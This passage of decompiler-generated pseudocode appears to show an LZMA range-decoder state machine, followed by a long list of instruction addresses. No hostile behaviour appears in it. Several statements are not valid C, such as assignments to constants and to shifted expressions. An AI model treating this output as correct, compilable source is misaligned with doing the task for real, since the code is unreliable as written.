												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x004062eb
0x004062eb
0x004062ef
0x00406310
0x00406317
0x0040631d
0x00406323
0x00406335
0x0040633b
0x00406340
0x00000000
0x004062f1
0x004062f7
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00406734
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00000000
0x0040673a
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
